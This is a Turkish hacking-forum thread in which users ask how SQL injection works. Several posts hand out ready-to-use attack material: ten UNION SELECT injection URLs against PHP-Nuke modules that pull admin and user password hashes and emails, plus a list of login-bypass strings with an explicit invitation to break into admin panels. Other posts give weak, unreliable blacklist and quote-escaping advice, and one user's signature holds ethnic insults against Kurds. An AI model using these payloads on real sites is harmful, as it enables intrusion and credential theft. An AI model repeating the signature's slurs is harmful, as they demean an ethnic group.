folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Sql Enjeksiyon Nasıl Oluyor?



Sql Enjeksiyon Nasıl Oluyor?

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BuZuL
    BuZuL's avatar
    Kayıt Tarihi: 09/Eylül/2005
    Erkek

    yav sql enjeksiyon nasıl oluyor bana biraz açıklarsanız sevinirim bilgi almam lazım linkte olabilir ?

    DAĞDA ÜÇ BEŞ KOYUN SÜRÜSÜ, TUTTURMUŞ BİR KÜRDİSTAN TÜRKÜSÜ, ELİNE ALMIŞ BAYRAK DİYE BİR MASA ÖRTÜSÜ, SATSAN BEŞ PARA ETMEZ NE DİRİSİ NE DE ÖLÜSÜ, SOYU SOYSUZ OLAN SENSİN TOPRAK SENİN NEYİNE, İTE İTLİK YAPIP KAFA TUTMA BEYİNE, ANLASA DEDİĞİMİ SOKAKTAKİ KÖPEK AĞLAR HALİNE, DUY ULAN SOYSUZ NE MUTLU TÜRKÜM DİYENE.......
    Reply With Quote Alıntı yap
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    amele_2
    amele_2's avatar
    Kayıt Tarihi: 01/Eylül/2005
    Erkek

    buzulum kimse zikine takmıyo lam seni


    puahahh:D


    bilsem ben alatırım amma:D :'((

    Ardından yüz köpek havlamayan kurt, kurt sayılmaz..
    Reply With Quote Alıntı yap
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fearlessalien
    fearlessalien's avatar
    Banlanmış Üye
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek
    SQL injection1



    http://www.hedefsite.com/modules.php?name=Private_Messages&a mp;file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNF TEVDVCAyLG51bGwsMSwxLG51bGwvKjox



    SQL injection2



    http://www.hedefsite.com/modules.php?name=Web_Links&l_op =viewlinkeditorial&lid=-1%20%20UNION%20SELECT%20name,1,p wd,aid%20FROM%20nuke_authors



    SQL injection 3



    http://www.hedefsite.com/modules.php?name=Downloads&d_op =modifydownloadrequest&%20lid=-1%20UNION%20SELECT%200,us ername,user_id,user_password,name,%20user_email,user_level,0 ,0%20FROM%20nuke_users



    SQL injection 4



    http://www.hedefsite.com/modules.php?name=Downloads&d_op =viewdownloadeditorial&lid=-1%20%20UNION%20SELECT%20user name,1,user_password,user_id%20FROM%20nuke_users



    SQL injection 5



    http://www.hedefsite.com/modules.php?name=Reviews&rop=sh owcontent&id=-1%20UNION%20%20SELECT%200,0,aid,pwd,email, email,100,pwd,url,url,10000,name%20FROM%20nuke_autho%20rs/*



    SQL injection 6



    http://www.hedefsite.com/modules.php?name=Web_Links&l_op =viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1% 20FROM%20nuke_authors/*



    SQL injection 7



    http://www.hedefsite.com/modules.php?name=Downloads&d_op =modifydownloadrequest&lid=-1%20UNION%20SELECT%200,usern ame,user_id,user_password,name,user_email,user_level,0,0%20F ROM%20nuke_users





    SQL injection 8



    http://www.hedefsite.com/modules.php?name=Downloads&d_op =viewdownloadcomments&lid=-1%20UNION%20SELECT%20username ,user_id,user_password,1%20FROM%20nuke_users/*





    SQL injection 9



    http://www.hedefsite.com/modules.php?name=Downloads&d_op =viewdownloadeditorial&lid%20UNION%20SELECT%20username,1 ,user_password,user_id%20FROM%20nuke_users




    SQL injection 10



    http://www.hedefsite.com/modules.php?name=Reviews&rop=sh owcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,ema il,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*
    "Söz konusu vatan ise, gerisi teferruattır"
    Reply With Quote Alıntı yap
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fearlessalien
    fearlessalien's avatar
    Banlanmış Üye
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek

    Enjeksiyon2


    Bazı acemi webmasterların sistemlerinde /admin.asp /admin/ gibi dizinlerde admin girişleri vardır..aşağıdaki kodlarla SQL enjeksiyon ile admin panelinden içeriye dalmayı deneyin..



    admin’--
    ’ or 0=0 --
    " or 0=0 --
    or 0=0 --
    ’ or 0=0 #
    " or 0=0 #
    or 0=0 #
    ’ or ’x’=’x
    " or "x"="x
    ’) or (’x’=’x
    ’ or 1=1--
    " or 1=1--
    or 1=1--
    ’ or a=a--
    " or "a"="a
    ’) or (’a’=’a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi’ or 1=1 --
    hi’ or ’a’=’a
    hi’) or (’a’=’a
    hi")or("a"="a

    "Söz konusu vatan ise, gerisi teferruattır"
    Reply With Quote Alıntı yap
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Rawkmetal
    Rawkmetal's avatar
    Kayıt Tarihi: 16/Şubat/2005
    Erkek

    sanırım sen asp'dekini soruyorsun..


    ilk önce url'leri Server.UrlEncode("") ile yöntemi ile kapatıcaksın.


    tablo yapılarını hata mesajlarında göstertmiceksin en basitinden


    10;drop table haberler gibi id=10'u siler


    arama bölümünde ' (tek tırnak) tablo yapılaırın fln veriri vs...


    böle böle gidio işte..

    dünya yan geldi. dalganıza bakın...
    Reply With Quote Alıntı yap
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ir2
    ir2's avatar
    Bilgi/Destek Madalyası Developer Madalyası
    Kayıt Tarihi: 10/Mayıs/2003
    Erkek

    ya şöyle ezber bilgi vermeyin almışınız phpnuke injectionu...


    şimdi bak database den mesela kullanıcı adı şifre kontrol ediyosun


    asp kodu:
    SQL="SELECT * FROM tblUyeler WHERE kullanici='" & txtKullanici & "' sifre='" & txtSifre & "'"


    txtKullanici ve txtSifre yi formdan aldık diye düşün şimdi normal uslu uslu şifremizi girelim sonuç ne olcak;
    SELECT * FROM tblUyeler WHERE kullanici='kullanici' sifre='123456'


    ama ' karakteriyle sorgudan çıkarsak;
    SELECT * FROM tblUyeler WHERE kullanici=''or'' sifre=''or''


    şeklinde bi sorgu oluşturuyoruz ki buda kullanıcı şifre kontrolü yapmadan boşluğa uyan ilk id yi getiriyo yada fakrlı kodlarda oluşturulabilir olay mantığı anlamak çünki öyle ezber sıralamayın

    Reply With Quote Alıntı yap
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BuZuL
    BuZuL's avatar
    Kayıt Tarihi: 09/Eylül/2005
    Erkek

     <%
    Function      Guvenlik(Yasak)
    Yasak = Replace (Yasak ,"=","",1,-1,1)
    Yasak = Replace (Yasak ,"&","",1,-1,1)
    Yasak = Replace (Yasak ,"*","",1,-1,1)
    Yasak = Replace (Yasak ,",","",1,-1,1)
    Yasak = Replace (Yasak ,"?","",1,-1,1)
    Yasak = Replace (Yasak ,"%","",1,-1,1)
    Yasak = Replace (Yasak ,"'","",1,-1,1)
    Yasak = Replace (Yasak ,Chr(34),"",1,-1,1)
    Yasak = Replace (Yasak ,"'","",1,-1,1)
    Yasak = Replace (Yasak ,"/","",1,-1,1)
    Yasak = Replace (Yasak ,"\","",1,-1,1)
    Yasak = Replace (Yasak ,"<","",1,-1,1)
    Yasak = Replace (Yasak ,">","",1,-1,1)
    Yasak = Replace (Yasak ,"And","",1,-1,1)
    Yasak = Replace (Yasak ,"Or","",1,-1,1)
    Guvenlik = Yasak
    End      Function
    %>


     


    böyle bir kod ne işe yarar engellemezmi ?

    DAĞDA ÜÇ BEŞ KOYUN SÜRÜSÜ, TUTTURMUŞ BİR KÜRDİSTAN TÜRKÜSÜ, ELİNE ALMIŞ BAYRAK DİYE BİR MASA ÖRTÜSÜ, SATSAN BEŞ PARA ETMEZ NE DİRİSİ NE DE ÖLÜSÜ, SOYU SOYSUZ OLAN SENSİN TOPRAK SENİN NEYİNE, İTE İTLİK YAPIP KAFA TUTMA BEYİNE, ANLASA DEDİĞİMİ SOKAKTAKİ KÖPEK AĞLAR HALİNE, DUY ULAN SOYSUZ NE MUTLU TÜRKÜM DİYENE.......
    Reply With Quote Alıntı yap
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ir2
    ir2's avatar
    Bilgi/Destek Madalyası Developer Madalyası
    Kayıt Tarihi: 10/Mayıs/2003
    Erkek

    o fazla abartı adamın formdan gelen bilgisinde virgül \ falan olamazmı sadece ' bunu '' yap " bunuda "" yapcan gerisi yalan

    Reply With Quote Alıntı yap
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fearlessalien
    fearlessalien's avatar
    Banlanmış Üye
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek
    ir2 bunu yazdı:


    ya şöyle ezber bilgi vermeyin almışınız phpnuke injectionu...


    şimdi bak database den mesela kullanıcı adı şifre kontrol ediyosun


    asp kodu:
    SQL="SELECT * FROM tblUyeler WHERE kullanici='" & txtKullanici & "' sifre='" & txtSifre & "'"


    txtKullanici ve txtSifre yi formdan aldık diye düşün şimdi normal uslu uslu şifremizi girelim sonuç ne olcak;
    SELECT * FROM tblUyeler WHERE kullanici='kullanici' sifre='123456'


    ama ' karakteriyle sorgudan çıkarsak;
    SELECT * FROM tblUyeler WHERE kullanici=''or'' sifre=''or''


    şeklinde bi sorgu oluşturuyoruz ki buda kullanıcı şifre kontrolü yapmadan boşluğa uyan ilk id yi getiriyo yada fakrlı kodlarda oluşturulabilir olay mantığı anlamak çünki öyle ezber sıralamayın



    ezbere bilgi değil,herkes istediği bilgiyi paylaşmakta özgürdür.Senin bildiğin sana,benim bildiğim bana doğrudur.
    "Söz konusu vatan ise, gerisi teferruattır"
    Reply With Quote Alıntı yap
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Muhalif Yorumcu
    SeRDaR
    SeRDaR's avatar
    Kayıt Tarihi: 09/Kasım/2003
    Erkek
    herkes asp de sql enjeksiyon yapıyor artık o...oldu afedersiniz ama bu iş php de nasıloluyor phpde gerçekten zor inceledimdebununla ilgilidöküman var mı ?
    Önemsediğin Kadar Önemsenirsin. Önemsendiğin Kadar Önemsensersin.
    Reply With Quote Alıntı yap
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    hipokondriyak
    hipokondriyak's avatar
    Kayıt Tarihi: 02/Temmuz/2007
    Erkek

    bi up yapalımkonuya duzugun sekılde anlatacak var mı yada anlatan yer varsa acıklarsanız cok sevınırım

    Homo sapiens, yaşamak için, diğer canlıların yaşamasına muhtaç; obligat parazit türüdür. "Sen olursan boş bardak , sana olur koyan çok su. a.g."
    Reply With Quote Alıntı yap
Toplam Hit: 6157 Toplam Mesaj: 11